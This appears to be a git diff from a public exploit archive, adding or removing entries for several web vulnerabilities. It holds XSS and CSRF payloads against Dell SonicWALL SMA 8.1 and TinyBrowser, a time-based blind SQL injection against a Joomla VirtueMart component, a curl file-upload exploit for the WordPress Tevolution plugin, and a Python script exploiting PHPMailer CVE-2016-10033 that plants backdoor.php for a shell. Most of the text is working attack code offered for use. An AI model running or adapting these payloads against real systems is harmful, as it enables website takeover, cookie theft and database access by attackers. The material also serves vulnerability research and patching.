b/platforms/hardware/webapps/40978.txt new file mode 100755 index 000000000..e3bceff2f --- /dev/null +++ b/platforms/hardware/webapps/40978.txt @@ -0,0 +1,63 @@ +Dell SonicWALL Secure Mobile Access SMA 8.1 XSS And WAF CSRF + + +Vendor: Dell Inc. +Product web page: https://www.sonicwall.com/products/secure-mobile-access/ +Affected version: 8.1 (SSL-VPN) + +Summary: Keep up with the demands of today’s remote workforce. Enable secure +mobile access to critical apps and data without compromising security. Choose +from a variety of scalable secure mobile access (SMA) appliances and intuitive +Mobile Connect apps to fit every size business and budget. + +Desc: SonicWALL SMA suffers from a XSS issue due to a failure to properly sanitize +user-supplied input to several parameters. Attackers can exploit this weakness +to execute arbitrary HTML and script code in a user's browser session. The WAF was +bypassed via form-based CSRF. + +Tested on: SonicWALL SSL-VPN Web Server + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5392 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5392.php + +Firmware fixed: 8.1.0.3 +Issue ID: 172692 +http://documents.software.dell.com/sonicwall-sma-100-series/8.1.0.3/release-notes/resolved-issues?ParentProduct=869 + + + +26.01.2016 + +-- + + +Reflected XSS via protocol parameter (GET): +------------------------------------------- + +https://127.0.0.1/cgi-bin/ftplauncher?protocol=sftp:&bmId=55 + + +XSS via arbitrary parameter (GET): +---------------------------------- + +https://127.0.0.1/cgi-bin/handleWAFRedirect?hdl=VqjLncColvAAAF4QB2YAAAAT&=zsl + + +XSS via REMOTEPATH parameter (GET): +----------------------------------- + +https://127.0.0.1/cgi-bin/soniclauncher?REMOTEPATH=//servername/share/&bmId=59 + + +WAF Cross-Site Request Forgery PoC: +----------------------------------- + +POST /cgi-bin/editBookmark HTTP/1.1 +Host: 127.0.0.1 + +bmName=%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2533%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e%250a&host=2&description=3&tabs=4&service=HTTP&screenSize=4&screenSizeHtml5=4&colorSize=3&macAddr=&wolTime=90&apppath=&folder=&appcmdline=&tsfarmserverlist=&langsel=1&redirectclipboard=on&displayconnectionbar=on&autoreconnection=on&bitmapcache=on&themes=on&rdpCompression=on&audiomode=3&rdpExperience=1&rdpServerAuthFailAction=2&charset=UTF-8&sshKeyFile=&defaultWindowSize=1&kexAlgoList=0%2C1%2C2&cipherAlgoList=&hmacAlgoList=&citrixWindowSize=1&citrixWindowWidth=0&citrixWindowHeight=0&citrixWindowPercentage=0&citrixLaunchMethod=Auto&forceInstalledCheckbox=on&icaAddr=&vncEncoding=0&vncCompression=0&vncCursorShapeUpdates=0&vncUseCopyrect=on&vncRestrictedColors=on&vncShareDesktop=on&MC_App=inherit&MC_Copy=inherit&MC_Print=inherit&MC_Offline=inherit&name=1%22+javascript%3Aconfirm(251)%3B&type=user&owner=zslab&cmd=edit&parentBmId=0&ownerdomain=ZSLAB&serviceManualConfigList=undefined&wantBmData=true&swcctn=1NcP8JhUY10emue9YQpON1p2c%3D6P0c9P&ok=OK diff --git a/platforms/php/webapps/38180.txt b/platforms/php/webapps/38180.txt deleted file mode 100755 index 2f8398bc9..000000000 --- a/platforms/php/webapps/38180.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/57230/info - -TinyBrowser is prone to multiple vulnerabilities. - -An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. - -http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie)) \ No newline at end of file diff --git a/platforms/php/webapps/38181.txt b/platforms/php/webapps/38181.txt deleted file mode 100755 index 7c16bac0f..000000000 --- a/platforms/php/webapps/38181.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/57230/info - -TinyBrowser is prone to multiple vulnerabilities. - -An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. - -http://www.example.com/site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)// \ No newline at end of file diff --git a/platforms/php/webapps/40973.txt b/platforms/php/webapps/40973.txt new file mode 100755 index 000000000..b35373cd5 --- /dev/null +++ b/platforms/php/webapps/40973.txt @@ -0,0 +1,24 @@ +# Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0 +# Date: 28-12-2016 +# Software Link: http://awebsupport.com/products/aweb-cartwatching-system +# Exploit Author: Javi Espejo(qemm) +# Contact: http://twitter.com/javiespejo +# Website: http://raipson.com +# CVE: REQUESTED +# Category: webapps + +1. Description + +Any remote user can access to the victim server trough a SQLI Blind Injection on a component of aweb_cartwatching_system and aweb_cart_autosave +This the code that has the parameters with the parameters not sanitized + +2. Proof of Concept + +option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries. + +3. Solution: + +Update to version 2.6.1 from the update center of joomla. +The Joomla vel publish the vulnerability on +Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0 +http://awebsupport.com/ diff --git a/platforms/php/webapps/40974.py b/platforms/php/webapps/40974.py new file mode 100755 index 000000000..9177ddc65 --- /dev/null +++ b/platforms/php/webapps/40974.py @@ -0,0 +1,65 @@ +""" +# Exploit Title: PHPMailer Exploit v1.0 +# Date: 29/12/2016 +# Exploit Author: Daniel aka anarc0der +# Version: PHPMailer < 5.2.18 +# Tested on: Arch Linux +# CVE : CVE 2016-10033 + +Description: +Exploiting PHPMail with back connection (reverse shell) from the target + +Usage: +1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033 +2 - Config your IP for reverse shell on payload variable +4 - Open nc listener in one terminal: $ nc -lnvp +3 - Open other terminal and run the exploit: python3 anarcoder.py + +Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU + +Full Advisory: +https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html +""" + +from requests_toolbelt import MultipartEncoder +import requests +import os +import base64 +from lxml import html as lh + +os.system('clear') +print("\n") +print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ") +print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗") +print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝") +print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗") +print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║") +print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝") +print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com") +print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n") + +target = 'http://localhost:8080' +backdoor = '/backdoor.php' + +payload = '' +fields={'action': 'submit', + 'name': payload, + 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com', + 'message': 'Pwned'} + +m = MultipartEncoder(fields=fields, + boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe') + +headers={'User-Agent': 'curl/7.47.0', + 'Content-Type': m.content_type} + +proxies = {'http': 'localhost:8081', 'https':'localhost:8081'} + + +print('[+] SeNdiNG eVIl SHeLL To TaRGeT....') +r = requests.post(target, data=m.to_string(), + headers=headers) +print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D') +r = requests.get(target+backdoor, headers=headers) +if r.status_code == 200: + print('[+] ExPLoITeD ' + target) \ No newline at end of file diff --git a/platforms/php/webapps/40976.txt b/platforms/php/webapps/40976.txt new file mode 100755 index 000000000..d50d4f5c8 --- /dev/null +++ b/platforms/php/webapps/40976.txt @@ -0,0 +1,24 @@ +# Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability +# Date: 30-12-2016 +# Software Link: Permium plugin +# Vendor Homepage: https://templatic.com/wordpress-plugins/tevolution +# Exploit Author: r3m1ck +# Website: https://www.r3m1ck.us/ +# Category: webapps +# Google Dork: inurl:"wp-content/plugins/Tevolution/" + +1. Description + +Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability. +Tevolution is not available for sale, it comes bundled with certain premium themes from templatic. + +2. Proof of Concept + +curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php + +3. Uploaded file location: + +Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name. +ex: +http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt +